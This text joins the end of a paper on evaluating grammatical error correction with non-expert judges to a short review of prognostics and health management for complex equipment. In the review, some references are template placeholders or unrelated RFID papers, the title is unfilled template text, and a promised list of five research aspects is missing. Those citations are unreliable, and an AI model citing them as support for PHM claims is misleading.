0.876), indicating that non- expert grammaticality judgments are comparably as reliable as those by experts. Compared to the best metric ranking shown in Figure 4, the non-expert ranking appears significantly better. No system has a rank more than two away from the expert rank, while GLEU has six systems with ranks that are three away. The non-expert correlation can be seen as an upper bound for the task, which is approached but not yet attained by automatic metrics. Systems in the same cluster, indicated by dotted lines in Figure 6, can be viewed as ties. From this perspective the expert and non-expert rankings are virtually identical. In addition, experts and non- experts have similar inter-annotator agreement in their pairwise system judgments (Table 7). The agreement between experts and non-experts is lower than the agreement between just experts or just non- 15In addition to Cohen’s κ, we report weighted κ because A > B and A < B should have less agreement than A > B and A = B. 179 experts, which may be due to the difference of these experimental settings for experts (Grundkiewicz et al., 2015) and for non-experts (this work). However, this finding is not overly concerning since the corre- lation between the rankings is so strong. In all, judgments cost approximately $140 ($0.2 per sentence) and took a total of 32 hours to com- plete. Because the non-expert ranking very strongly correlates to the expert ranking and non-experts have similar IAA as experts, we conclude that ex- pensive expert judgments can be replaced by non- experts, when those annotators have been appropri- ately screened. 6 Conclusion There is a real distinction between technical gram- maticality and fluency. Fluency is a level of mastery that goes beyond knowledge of how to follow the rules, and includes knowing when they can be bro- ken or flouted. Language learners—who are a prime constituency motivating the GEC task—ultimately care about the latter. But crucially, the current ap- proach of collecting error-coded annotations places downward pressure on annotators to minimize edits in order to neatly label them. This results in anno- tations that are less fluent, and therefore less use- ful, than they should be. We have demonstrated this with the collection of both minimally-edited and flu- ent rewrites of a common test set (Section 3.1); the preference for fluent rewrites over minimal edits is clear (Table 5). To correct this, the annotations and associated metrics used to score automated GEC systems should be brought more in line with this broad- ened goal. We advocate for the collection of flu- ent sentence-level rewrites of ungrammatical sen- tences, which is cheaper than error-coded annota- tions and provides annotators with the freedom to produce fluent edits. In the realm of automatic met- rics, we found that a modified form of GLEU com- puted against expert fluency rewrites correlates best with a human ranking of the systems; a close runner- up collects the rewrites from non-experts instead of experts. Finally, to stimulate metric development, we found that we were able to produce a new human ranking of systems using non-expert judges. These judges produced a ranking that was highly corre- lated with the expert ranking produced in earlier work (Grundkiewicz et al., 2015). The implication is further reduced costs in producing a gold-standard ranking for new sets of system outputs against both existing and new corpora. As a result, we make the following recommenda- tions: • GEC should be evaluated against 2–4 whole- sentence rewrites, which can be obtained by non-experts. • Automatic metrics that rely on error coding are not necessary, depending on the use case. Of the automatic metrics that have been pro- posed, we found that a modified form of GLEU (Napoles et al., 2015) is the best-correlated. • The field of GEC is in danger from over- reliance on a single annotated corpus (NU- CLE). New corpora should be produced in a regular fashion, similar to the Workshop on Statistical Machine Translation. Fortunately, collecting annotations in the form of unannotated sentence-level rewrites is much cheaper than error-coding, facilitating these practices. By framing grammatical error correction as flu- ency, we can reduce the cost of annotation while cre- ating a more reliable gold standard. We have clearly laid improved practices for annotation and evalua- tion, demonstrating that better quality results can be achieved for less cost using fluency edits instead of error coding. All of the source code and data, in- cluding templates for data collection, will be pub- licly available, which we believe is crucial for sup- porting the improvement of GEC in the long term. Acknowledgments We would like to thank Christopher Bryant, Mariano Felice, Roman Grundkiewicz and Marcin Junczys- Dowmunt for providing data and code. We would also like to thank the TACL editor, Chris Quirk, and the three anonymous reviewers for their comments and feedback. This material is based upon work partially supported by the National Science Founda- tion Graduate Research Fellowship under Grant No. 1232825. 180 References Ondrej Bojar, Christian Buck, Christian Federmann, Barry Haddow, Philipp Koehn, Johannes Leveling, Christof Monz, Pavel Pecina, Matt Post, Herve Saint- Amand, Radu Soricut, Lucia Specia, and Aleš Tam- chyna. 2014. Findings of the 2014 Workshop on Sta- tistical Machine Translation. In Proceedings of the Ninth Workshop on Statistical Machine Translation, pages 12–58, Baltimore, Maryland, USA, June. As- sociation for Computational Linguistics. Ondřej Bojar, Rajen Chatterjee, Christian Federmann, Barry Haddow, Matthias Huck, Chris Hokamp, Philipp Koehn, Varvara Logacheva, Christof Monz, Matteo Negri, Matt Post, Carolina Scarton, Lucia Specia, and Marco Turchi. 2015. Findings of the 2015 Workshop on Statistical Machine Translation. In Proceedings of the Tenth Workshop on Statistical Machine Transla- tion, pages 1–46, Lisbon, Portugal, September. Asso- ciation for Computational Linguistics. Christopher Bryant and Hwee Tou Ng. 2015. How far are we from fully automatic high quality grammatical error correction? In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguis- tics and the 7th International Joint Conference on Nat- ural Language Processing (Volume 1: Long Papers), pages 697–707, Beijing, China, July. Association for Computational Linguistics. Martin Chodorow and Claudia Leacock. 2000. An unsu- pervised method for detecting grammatical errors. In Proceedings of the Conference of the North American Chapter of the Association of Computational Linguis- tics (NAACL), pages 140–147. Martin Chodorow, Markus Dickinson, Ross Israel, and Joel Tetreault. 2012. Problems in evaluating gram- matical error detection systems. In Proceedings of COLING 2012, pages 611–628, Mumbai, India, De- cember. The COLING 2012 Organizing Committee. Daniel Dahlmeier and Hwee Tou Ng. 2012. Better evaluation for grammatical error correction. In Pro- ceedings of the 2012 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, pages 568– 572, Montréal, Canada, June. Association for Compu- tational Linguistics. Daniel Dahlmeier, Hwee Tou Ng, and Siew Mei Wu. 2013. Building a large annotated corpus of learner en- glish: The NUS Corpus of Learner English. In Pro- ceedings of the Eighth Workshop on Innovative Use of NLP for Building Educational Applications, pages 22–31, Atlanta, Georgia, June. Association for Com- putational Linguistics. Robert Dale and Adam Kilgarriff. 2011. Helping our own: The HOO 2011 pilot shared task. In Proceedings of the Generation Challenges Session at the 13th Eu- ropean Workshop on Natural Language Generation, pages 242–249, Nancy, France, September. Associa- tion for Computational Linguistics. Robert Dale, Ilya Anisimoff, and George Narroway. 2012. HOO 2012: A report on the preposition and determiner error correction shared task. In Proceed- ings of the Seventh Workshop on Building Educational Applications Using NLP, pages 54–62, Montréal, Canada, June. Association for Computational Linguis- tics. Mariano Felice and Ted Briscoe. 2015. Towards a stan- dard evaluation method for grammatical error detec- tion and correction. In Proceedings of the 2015 Con- ference of the North American Chapter of the Associa- tion for Computational Linguistics, Denver, CO, June. Association for Computational Linguistics. Roman Grundkiewicz, Marcin Junczys-Dowmunt, and Edward Gillian. 2015. Human evaluation of gram- matical error correction systems. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 461–470, Lisbon, Portu- gal, September. Association for Computational Lin- guistics. Ralf Herbrich, Tom Minka, and Thore Graepel. 2006. TrueSkillTM: A Bayesian Skill Rating System. In Proceedings of the Twentieth Annual Conference on Neural Information Processing Systems, pages 569– 576, Vancouver, British Columbia, Canada, Decem- ber. MIT Press. Philipp Koehn. 2012. Simulating human judgment in machine translation evaluation campaigns. Proceed- ings IWSLT 2012. C. Leacock, M. Chodorow, M. Gamon, and J. Tetreault. 2014. Automated Grammatical Error Detection for Language Learners, Second Edition. Synthesis Lec- tures on Human Language Technologies. Morgan & Claypool Publishers. Nitin Madnani, Martin Chodorow, Joel Tetreault, and Alla Rozovskaya. 2011. They can help: Using crowd- sourcing to improve the evaluation of grammatical er- ror detection systems. In Proceedings of the 49th An- nual Meeting of the Association for Computational Linguistics: Human Language Technologies, pages 508–513, Portland, Oregon, USA, June. Association for Computational Linguistics. Andrew Mutton, Mark Dras, Stephen Wan, and Robert Dale. 2007. Gleu: Automatic evaluation of sentence- level fluency. In Proceedings of the 45th Annual Meet- ing of the Association of Computational Linguistics, pages 344–351, Prague, Czech Republic, June. Asso- ciation for Computational Linguistics. Courtney Napoles, Keisuke Sakaguchi, Matt Post, and Joel Tetreault. 2015. Ground truth for grammatical 181 error correction metrics. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 2: Short Pa- pers), pages 588–593, Beijing, China, July. Associa- tion for Computational Linguistics. Hwee Tou Ng, Siew Mei Wu, Yuanbin Wu, Christian Hadiwinoto, and Joel Tetreault. 2013. The CoNLL- 2013 Shared Task on grammatical error correction. In Proceedings of the Seventeenth Conference on Com- putational Natural Language Learning: Shared Task, pages 1–12, Sofia, Bulgaria, August. Association for Computational Linguistics. Hwee Tou Ng, Siew Mei Wu, Ted Briscoe, Christian Hadiwinoto, Raymond Hendy Susanto, and Christo- pher Bryant. 2014. The CoNLL-2014 Shared Task on grammatical error correction. In Proceedings of the Eighteenth Conference on Computational Natural Language Learning: Shared Task, pages 1–14, Balti- more, Maryland, June. Association for Computational Linguistics. Diane Nicholls. 2003. The Cambridge Learner Corpus: Error coding and analysis for lexicography and ELT. In Proceedings of the Corpus Linguistics 2003 confer- ence, pages 572–581. Kishore Papineni, Salim Roukos, Todd Ward, and Wei- Jing Zhu. 2002. BLEU: a method for automatic eval- uation of machine translation. In Proceedings of 40th Annual Meeting of the Association for Computational Linguistics, pages 311–318, Philadelphia, Pennsylva- nia, USA, July. Association for Computational Lin- guistics. Ellie Pavlick, Rui Yan, and Chris Callison-Burch. 2014. Crowdsourcing for grammatical error correction. In Proceedings of the companion publication of the 17th ACM conference on Computer supported cooperative work & social computing, pages 209–212. ACM. Alla Rozovskaya and Dan Roth. 2010. Annotating ESL errors: Challenges and rewards. In Proceedings of the NAACL HLT 2010 Fifth Workshop on Innovative Use of NLP for Building Educational Applications, pages 28–36, Los Angeles, California, June. Association for Computational Linguistics. Alla Rozovskaya and Dan Roth. 2014. Building a state- of-the-art grammatical error correction system. Trans- actions of the Association for Computational Linguis- tics, 2:414–434. Keisuke Sakaguchi, Matt Post, and Benjamin Van Durme. 2014. Efficient elicitation of anno- tations for human evaluation of machine translation. In Proceedings of the Ninth Workshop on Statisti- cal Machine Translation, pages 1–11, Baltimore, Maryland, USA, June. Association for Computational Linguistics. Matthew Snover, Bonnie Dorr, Richard Schwartz, Lin- nea Micciulla, and John Makhoul. 2006. A study of translation edit rate with targeted human annotation. In Proceedings of Association for Machine Translation in the Americas, pages 223–231. Ben Swanson and Elif Yamangil. 2012. Correction de- tection and error type selection as an ESL educational aid. In Proceedings of the 2012 Conference of the North American Chapter of the Association for Com- putational Linguistics: Human Language Technolo- gies, pages 357–361, Montréal, Canada, June. Asso- ciation for Computational Linguistics. Joel Tetreault and Martin Chodorow. 2008. Native judg- ments of non-native usage: Experiments in preposi- tion error detection. In Coling 2008: Proceedings of the workshop on Human Judgements in Computational Linguistics, pages 24–32, Manchester, UK, August. Coling 2008 Organizing Committee. Joel Tetreault, Elena Filatova, and Martin Chodorow. 2010. Rethinking grammatical error annotation and evaluation with the Amazon Mechanical Turk. In Proceedings of the NAACL HLT 2010 Fifth Workshop on Innovative Use of NLP for Building Educational Applications, pages 45–48, Los Angeles, California, June. Association for Computational Linguistics. Joel Tetreault, Martin Chodorow, and Nitin Madnani. 2014. Bucking the trend: Improved evaluation and annotation practices for ESL error detection systems. Language Resources and Evaluation, 48(1):5–31. Huichao Xue and Rebecca Hwa. 2014. Improved correc- tion detection in revised ESL sentences. In Proceed- ings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 599–604, Baltimore, Maryland, June. Associa- tion for Computational Linguistics. Helen Yannakoudakis, Ted Briscoe, and Ben Medlock. 2011. A new dataset and method for automatically grading ESOL texts. In Proceedings of the 49th An- nual Meeting of the Association for Computational Linguistics: Human Language Technologies, pages 180–189, Portland, Oregon, USA, June. Association for Computational Linguistics. 182 work_ofi4snsh4bfibk6cmnicyk37ai ---- Your Paper's Title Starts Here: Please Center 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 115 A Review on Prognostics and Health Management Nannan Hu a , Xiaohao Su b and Baolong Liu c School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China a e-mail: 1257275813@qq.com b e-mail: su-xiaohao@foxmail.com c e-mail: liu.bao.long@hotmail.com Abstract—The health management of complex equipment is crucial to ensure the reliability, maintainability and safety of complex equipment. This paper introduces the basic concept and research connotation of prognostics and health management (PHM), analyzes the significance of PHM technology in equipment maintenance. For the fault prediction architecture and method, this paper focuses on the discussion, analysis, and summarizes the current research’s hot spots and existing technical difficulties. Finally, the future research directions are also prospected. Keywords-Fault Prognostics; Health Management; Fault Diagnosis; Remaining Life I. INTRODUCTION With the rapid development of modern technologies, especially information technologies, the complexity, integration, and intelligence of a large number of complex systems are constantly increasing, and the costs of research, production, and especially maintenance and protection are increasing. At the same time, due to the increase of components and influence factors, the probability of failure and function failure gradually increases. Therefore, the fault diagnosis and maintenance of complex systems gradually become the focus of researchers. PHM [1-2] is gaining more and more attention. The concept of PHM first appeared in military equipment, obtained applications in complex systems and equipment such as spacecraft, aircraft and nuclear reactors. With the continuous development of PHM technology, PHM has been gradually focused by many industrial fields in electronics, automobile, ships, the safety of engineering structures and other applications are also increasing [3-5]. The PHM is a further extension of the build-in test (BIT) and state’s health monitoring capabilities used for complex systems. It is a shift from state monitoring to health management, to identify and manage the occurrence of faults, planning maintenance and supply assurance. The main purpose is to reduce the maintenance costs, improve equipment system security and tasks’ success, achieve condition-based maintenance [6] (CBM) and autonomous protection with less maintenance inputs. II. CONNOTATION OF PHM A. The Basic Concept of PHM PHM contains two aspects, fault prognostics and health management. Health refers to the performance’s degradation or deviation compared with the expected normal performance state. Failure prognostics refers to the prediction based on the current or historical performance state of the system, diagnose its function, including determining the remaining life of the system or the length of time it is expected to work; Health management is a ability to make appropriate decisions, based on diagnostic, prognostic information, available maintenance resources and usage requirements. PHM represents a shift in approach, in maintenance strategy and conceptual, that enables a shift from traditional sensor- based diagnostics to prognostics based on intelligent systems, to provide accurate technical support at the right time. PHM technology also makes after-hours maintenance or regular maintenance strategies are replaced by the situation of maintenance. This change can bring the following improvements to the actual equipment protection [7]:  Provide senior alarm of system failure.  Provide condition-based maintenance ability.  Improve the availability of the system through maintenance cycle extension.  Reduce the cost of full life cycle by reducing inspection cost and failure time.  Reduce the occurrence of intermittent and no fault founds (NFF). B. Connotation of PHM In system function [8], PHM can achieve state monitoring, fault detection, failure prediction, the remaining life prognostics of key components or system; It is a combination of multiple frontiers and Interdisciplinary. In the evolution of technology, it is the improvement of traditional equipment condition monitoring and fault diagnosis, emphasizing the discovery of equipment failure before the failure of early signs, tracking the development of fault symptoms while assessing the remaining useful life of the equipment, providing decision’s support for the maintenance of the equipment ultimately. The health degradation process of a device is a process in which the device's health status changes from normal to degressive until the function fails. Equipment health degradation process is shown in [9-10] Fig. 1. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 116 E q u ip m e n t h e a lt h l e v e l failure occurred detection point current status point function failure pointnormal left life degraded performance failure 1.0 0.8 0.6 0.4 0.2 0 Figure 1. Equipment health degradation process. In view of the above typical equipment health degradation process, the fault system should have early fault detection capabilities, and monitor its degradation process. Fault prognostics research includes the following aspects:  Evaluate which health condition the current device is in its health degradation process: a normal state, a degraded performance state, or a functional failure state.  When the equipment is in a state of degraded performance, judging what kind of failure mode which causes its health level to drop, and evaluating the current state of health deviation from its normal state.  Predicting the future state of health of equipment, it has two forms: (1) Study whether the equipment can complete its functional requirements normally in a period of time in the future (2) Study the remaining life of equipment III. SYSTEM APPLICATION OF PHM A. PHM’s Framework PHM systems generally should be capable of fault detection, fault isolation, enhanced diagnostics, performance testing, fault prognostic, health management, and component life tracking [11]. Most fault diagnosis and fault prognostic tools have domain-related features [12-13]. The PHM technical system framework is shown in Fig. 2. sensor pretreat Analysis of telecommunication characteristics FMECA Historical data and operational status data Maintain task resources feature extraction Signal Processing Fault classification Prognostics Prediction of failure evolution Maintenance plan Fault prediction Maintain... current fault status CBM PHM Figure 2. Framework for PHM. The method system of PHM technology is shown in Fig.3. Firstly, evaluating the virtual life; Through the input of design data, expected life cycle operating conditions, failure modes and failure impact analysis (FMMEA) and physics-of-failure (PoFs) models, etc., to achieve reliability (or virtual life) evaluation. FMECA is of great significance in the selection of design schemes, objective evaluation of relevant measures (such as unnecessary measures) and testing equipment, and at the same 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 117 time. In order to apply it to the design of fault prognostics and state management, the following parts should be added to the traditional FMEA: the signs and symptoms before the failure mode occurs; the signs that the product or function may have been severely damaged; the signs of the failure mode are observed or the location of sensors; fault detection methods and fault prognostic methods [15]. During FMECA analysis, when analyzing the cause of fault, it is also necessary to analyze the potential source of fault in depth, emphasizing the relationship between other products or external factors in the state of each other. If FMEA analysis table further analyzes the "root cause of the fault" for the cause of the fault, it firstly analyzes the root fault mode, and identifies external manifestation of the root cause, and its functional impact on the subsystem or equipment. If there is no problem (such as temperature, degree of vacuum, normal pressure, etc.) through the detection or monitor, then it is no longer necessary to take the FMEA analysis for the root cause of fault. Design data Expectation of life FMMCA PoF model Virtual life assessment Sensor data already available Bus monitoring data Maintain and test records System health status and pre-diagnosis status Prediction of life loss based on PoF Failure signs Early warning monitoring Remaining life assessment Full life cycle assurance and cost analysis Figure 3. General methodology of PHM [11]. By performing a virtual life assessment, the major failure modes and failure mechanisms to be prioritized can be determined. Existing sensor data, monitoring data, maintenance and inspection records can also be used to identify abnormal conditions and parameters. In the entire methodological system, prediction is the core method and research content to achieve system performance degradation status and remaining life prediction. B. Fault prognostic model design of PHM PHM is a new system maintenance and management philosophy that significantly improves the understanding of the behavior of complex systems through comprehensive fault detection, isolation and prognostic and state management [16]. At the same time, information on key components is also collected and processed to prognostic the remaining useful life. The realization of fault prognostics mainly depends on the model design. In view of the complicated system of PHM, it is urgent to develop and design a general prognostic framework to select and integrate the appropriate methods of diagnosis and prediction. Improve the utilization of information, and achieve multi-angle and multi-parameter prognostic, improve the level of diagnosis and prognostics [17]. In order to accurately predict a fault before it occurs, it is necessary to capture the symptom of the fault by monitoring the change of the system state parameter. For a slowly changing fault, before the near failure occurs, the rate of change of the system state parameter usually increases sharply. Therefore, it is the key to successfully predicting failures by reasonably determining the critical point of state change that is about to occur. First, based on the results of signal analysis, the analysis of the root cause of the failure, and the extension of FMECA results, the correlation equations between the model parameters i  (describe the overall state of the system) and the physical parameters j P (describe subsystems and part properties) is established as follows: )( ji Pf (1) Estimating signal input and output parameter from the measurement, the estimated model parameter i  to calculate the actual physical parameters： )( 1 i fP    (2) Determine the change of the actual physical parameter 0 P relative to the nominal physical parameter value P [18]. P is a reflection of the operational status of the equipment, whether the system is abnormal operating status, the size of the anomalies. They can be real-time described by P ’s value and changes. When setting up the correlation equation )( ji Pf , the limit value should be 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 118 set to the value at the performance of the system suddenly begins to change drastically. Observe the value of P in real time, according to the changes of P (whether exceed the critical value), as well as changes in the physical parameters, the corresponding relationship between the decision-making, to determine whether the failure will occur. Finally, the use of statistical decisions or hypothesis testing, fault separation, to determine the impending failure causes, size and type [19]. In addition, after the fault symptoms have been identified, fault trends should be analyzed to quantify the time since the device state was abruptly changed to the time when fault to occur. Fault trends are closely related to the material properties, design, and structural characteristics of the equipment or component. So the speed and trend of fault development can be described by computer simulation. The relationship between the remaining life of the system and the running status and running time can finally be expressed in the form of a three-dimensional surface. Fault prognostics output characteristic surface simulate as Fig. 4. The x-axis represents time, the y-axis represents P that reflects the working status, and the z-axis represents the remaining life of the part or system. This figure can intuitively and accurately represent the remaining life of any part or system that corresponds to any operating state and any operating time point. Figure 4. Fault prediction output characteristic surface map. IV. ALGORITHM OF FAULT PROGNOSTIC According to the theories, methods and technical routes applied in the actual research, the fault prognostics technology can be divided into three types [20-25]: As shown in Fig. 5 below: The prognostic techniques are divided into three categories: (1) model-driven fault prognostics techniques; (2) data-driven fault prognostics techniques; (3) fault prognostics techniques based on statistical reliability (probability-based); The three methods in the engineering application of the extensive weakened in order, but the prognostics accuracy risen, the difficulty and cost associated with it also increased [26-28]. The following is a brief introduction to all kinds of forecasting methods. Figure 5. Algorithms of fault prognostics.. A. Model-driven Fault Pragnostics Techniques Model-driven fault prognostic is a technique using either a dynamic model or process prognostics method. Physical model approach, Kalman/Extended Kalman filter/particle filter and expert-based methods can be classified in Model-driven fault prognostics [26]. Model- based fault prognostics techniques generally require the mathematical models of the object system to be known. Such methods provide a means of grasping the failure mode process of the component or system being predicted. By calculating the functional impairment under system operating conditions, to assess the loss of critical components and to assess the cumulative effects of failures in the use of the 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 119 components over the life, to evaluate the remaining useful life by integrating physical models with stochastic process modeling distribution. Model-based fault prognostics techniques have the property of being able to penetrate the nature of the object system and the advantages of real-time. Adams [29] put forward the damage accumulation model of the first/second order nonlinear differential equation in the structural dynamic system. Chelidze [30] expressed the model of the performance degradation in the slow process; the process corresponds with time-varying. The model is used to track battery degradation (voltage). In [31], a non-linear stochastic model is proposed to model the mechanical structure. The model uses the generalized Kalman filter to estimate the current fault condition of the system in real time and predict the remaining life of the system. The literature [32-33] introduced estimating the residual life by estimating the two defect propagation models for a bearing-loaded mechanical model. Luo [34] proposed a data-based synthetic forecasting process using model-based simulation data under nominal and degraded conditions. At present, most of the model-based methods are used in electromechanical systems such as aircraft and rotating machinery. For complex electronic systems, because of failure mechanisms are relatively complicated, so the modeling of fault prognostic lags behind. B. Data-driven Fault Pragnostics Techniques Compared with regression analysis and time series analysis [36] in the traditional statistical category, neural network is one of the most used methods in fault prognostic methods and applications. Unlike the model- based methods, neural networks are based on data-driven approaches that allow data to be self-adaptive can learn from samples, and try to capture intrinsic functional relationships between sample data. Zhang and Ganesan [35] applied a self-organizing neural network to multivariate trend forecasting and applied to the prognostic of the remaining life of the bearing system. Reference [36] used recurrent neural networks (RNN) to predict system fault trends. And as the research progresses, many improved or special forms of neural network algorithms have emerged, such as wavelet neural networks (WNN), fuzzy neural networks (FNN), etc. These improved neural network algorithms have also achieved good results in fault diagnosis and prognostic. The data-driven fault prognostic technology does not need the prior knowledge (mathematical model and expert experience) of the object system, and based on the collected data, the hidden information can be obtained through various data analysis and processing methods to prognosticate the operation. Thus, The shortcomings of the model and knowledge-based fault prognostics technology have become a more practical fault prognostics method. However, typical data (historical work data, fault injection data, and simulation experiment data) for some of the key devices in practice are usually very expensive to obtain; And even they are often highly uncertain and incompleteness, these problems all increase the difficulty of realizing the fault prognostic technology. C. Fault Pragnostics Techniques Based on Statistical Reliability This method requires less detail than model-based methods, because the information needed for the prognostic is contained in a series of different probability density functions (PDFs), without the need for dynamic differential equations. The advantage of this approach is that the required PDF can be obtained by analyzing the statistics, and the resulting PDF can provide sufficient support for the prognostic. In addition, the prognostic given by this method contains the confidence level, which can also well characterize the prognostic result. The typical fault probability curve based on statistical reliability is the famous "bathtub curve", as shown in Fig 1. That is, the failure rate is relatively high at the beginning of the operation of the equipment or system. After a period of stable operation, the failure rate can generally be maintained at a relatively low level, and then, after a period of operation, the failure rate starts to increase again, until all parts or equipment have failed. Equipment production characteristics, historical changes, performance degradation and other life-cycle factors make the fault prognostic based on system characteristics more complicated. All of these factors will have a certain probability impact on the prognostic results. Also need to consider reducing fault prognostic false alarm rate. D. The Comparison of Fault Prognostic Algorithm Through the literature to research, the commonly used prognostic algorithms are summarized, as shown in Table 1: 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 120 TABLE I. ALGORITHMS OF FAULT PROGNOSTICS Algorithms of fault prognostics Content Advantage Disadvantages Time Domain Analysis Directly use the waveform Can directly show the different signals The amount of information that can be provided is relatively small Fourier transform Signal is decomposed into sinusoidal waves of different frequencies to distort the frequency domain Suitable for smooth signal; Frequency domain analysis of the signal Unable to analyze in real time; The effect of non-stationary signal is not good Principal component analysis Through the original data into irrelevant feature data, in order to achieve the purpose of reducing the number of data Reduce the dimensionality of the original data and retain the information of the original data Linear conversion; Applicability is not strong Fisher linear discriminant Find a map to reduce the original data to the minimum dimension Reduce data to the lowest dimension while maintaining data resolution Linear dimensionality reduction Gaussian mixture model Fusion of multiple Gaussian probability density functions Can approach any segment with arbitrary precision The parameter selection has a great influence on the model predictability Kalman filter Linear, unbiased, minimum variance criterion recursive valuation Less calculation; High prognostic accuracy; Better robustness Only for linear systems We must first establish a system measurement model Neural Networks Simulate the human nervous system, thro- ugh training of known data to establish the relationship in I/O Good applicability, complex systems (including non-linear, non-stationary process) Need a lot of data to train; Select the neural network structure of the standard is not uniform Expert system Build a computer program with a great deal of expertise and experience to predict Can constantly modify the original knowledge or learn new knowledge The establishment of knowledge base needs to be accumulated for a long time Fuzzy technology Prognostic the relationship between the fault symptom and the cause of the fault Suitable for systems with less data and no accurate model; Closer to the person's judgment process Need a more accurate membership function; Low accuracy V. PHM OUTLOOK At present, China's national science and technology industry has a strong demand for PHM technology. Drawing on and absorbing foreign advanced experience, the study of PHM key technologies can provide the basic technical reserve for the development of a new generation of weapons and equipment in our country, lay the foundation for engineering application and better promote the rapid development of China's national industry. There are following five aspects should be hard work. The process of fault prediction is often uncertain. Up to now, there is no general complex system in China. It is of great significance to our national defense industry and economic development. This paper summarizes the basic concepts, research connotation and basic research status of PHM by drawing from foreign advanced experience and deeply studying the key technologies of PHM. It mainly summarizes the main methods of PHM architecture and fault prognostic. Improve the specific technology, used in system development, will be the next major direction of research. ACKNOWLEDGMENT This work is partially supported by Science & Technology Program of Shaanxi Province with project “2017GY-196” and “2015KTCXSF-10-11”, and the Opening Fund of State and Local Engineering Laboratory of Advanced Network and Monitoring Control with project “GSYSJ2016001”. REFERENCES [1] HESS A, FILA L. The joint strike fighter (JSF) PHM Concept: Potential impact on aging aircraft problems[C]. Proceedings of IEEE Aerospace Conference, Big Sky, Montana, USA, 2002, 6: 3021-3026. [2] KEITH M J, RAYMOND R B. Diagnostics to Prognostics - A product availability technology evolution[C]. The 53rd Annual Reliability and Maintainability Symposium(RAMS 2007), Orlando, FL, USA, 2007: 113-118. [3] NISHAD P, DIGANTA D, GOEBEL K, et al. Identification of Failure Precursor Parameters for Insulated Gate Bipolar Transistors (IGBTs)[C]. 2008 International Conference on Prognostics and Health Manageme- nt(PHM 2008), Denver, CO, USA, 2008: 1-5. [4] HAN G T. Prognostics and health management of avionics[J]. Avionics Technology, 2009, 40(1): 30-38. [5] ZHANG B ZH. Evolution and application of PHM technology[J]. Measurement & Control Technology, 2008, 23(2): 5-7. [6] ANDREW K S, LIN D, BANJEVIC D. A review on machinery diagnostics and prognostics implementing condition- based maintenance[J]. Mechanical Systems and Signal Processing, 2006,20: 1483-1510. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 121 [7] XU P, KANG R. Research on prognostic and health management (PHM) technology[J]. Measurement and Control Technology, 2004,23(12): 58-60. [8] MICHAEL G P.Prognostics and health management of electronics[M]. John Wiley & Sons. Inc., Hoboken, New Jersey, 2008: 3-20. [9] ANDREW H, LEO F. The joint strike fighter (JSF) PHM concept: Potential impact on aging aircraft problems[C], Proceedings of IEEE Aerospace Conference, Big Sky, Montana, USA, 2002,6: 3021-3026. [10] PAN Q W, LI T, LI X SH. Research on the architecture of prognostics and health management system[J]. Journal of Electronic Measurement and Instrument, 2007 (Sup-pl.): 32-37. [11] Hess A,Calvello G,Dabney T.[A].Aerospace Conference 2004 Proceedings.2004 IEEE[C]. 2001. [12] Araiza M L, Kent R, Espinosa R.[A]. AUTOTESTCON Proceedings 2002 IEEE〔C〕.Oct. 2002 Pages:818 一 841. [13] Su L P, Nolan M, DeMare G, et al. [A]. AUTOTESTCON’99 IEEE Systems Readiness Technology Confer- ence [C]. 1999. [14] Jay Lee,Fangji Wu,Wenyu Zhao,Masoud Ghaffari,Linxia Liao,David Siegel. Prognostics and health manage-ment design for rotary machinery systems—Reviews, methodology and applications[J]. Mechanical Systems and Signal Processing,2014,42(1-2). [15] Lu Bo, Lu Yuping, Fang Xigao. Research on Neural Network Dynamic Inverse Control of Hypersonic Vehi-cles[J]. Computer Measurement and Control, 2008, 16(7):966-968: [16] Ma Ning, Lv Chen. Research on Aircraft Failure Prediction and Health Management Framework[ J]. Journal of Huazhong University of Science and Technology (Science and Technology), 2009, 37(Sup.): 207-209. [17] Chang Qi, Yuan Shenfang. Aircraft Integrated Health Management (IVHM) System Technology Status and Development [J]. Systems Engineering and Electronics, 2009, 31(11): 2652-2657. [18] Hu Changhua,Xu Hualong. Control system fault diagnosis and fault-tolerant control analysis and design [M]. Beijing: National Defense Industry Press, 2000. [19] Hardman W, Hess A, Blunt D, et al. A USN development strategy and demonstration results for propulsion and mechanical systems diagnostics, prognostics and health management[ A]. Proceedings of the 2000 IEEE Ae-rospace Conference[ C]. Piscat-away: IEEE Inc., 2001: 3059-3068. [20] Lv Chen. Fault Diagnosis and Prediction Technology - Principles and Applications [M]. [20] Beijing: Beijing University of Aeronautics and Astronautics Press, 2012. [21] Liu Zhen. Research on Intelligent BIT Diagnostic Method and Its Application in Multi-Electric Aircraft Pow-er System [D]. Xi'an: PhD thesis of Northwestern Polytechnical University, 2006. [22] Xu Lijia. Electronic system fault prediction and health management technology research [D]. Chengdu: Unv- ersity of Electronic Science and Technology PhD thesis, 2009. [23] Liu Xiaohui.Study on RFID anti-collision algorithm based on binary number [D]. Changchun: Jilin University, 2015. [24] Shuen Chih Tsai,Yu-Min Hu,Chen-Hsun Chai et al.Efficient tag reading protocol for large-scale RFID syst- ems with rereading[J]. Computer Communications,2016,88:73-83. [25] G. Eason, B. Noble, and I. N. Sneddon, “On certain integrals of Lipschitz-Hankel type involving products of Bessel functions,” Phil. Trans. Roy. Soc. London, vol. A247, pp. 529–551, April 1955. (references) [26] Zhang Bo. Research on Anti-collision Technology of CFD [D]. Shanghai: Donghua University, 2010. [27] G. Eason, B. Noble, and I. N. Sneddon, “On certain integrals of Lipschitz-Hankel type involving products of Bessel functions,” Phil. Trans. Roy. Soc. London, vol. A247, pp. 529–551, April 1955. (references) [28] MICHAEL G P. Prognostics and health management of electronics[M]. John Wiley & Sons.Inc., Hoboken, New Jersey, 2008, 3-20. [29] VACHTSEVANOS G, LEWIS F, ROEMER M, et al. Intelligent Fault Diagnosis and Prognosis for Engineering Systems[M]. John Wiley & Sons, Inc, 2006: 284-354. 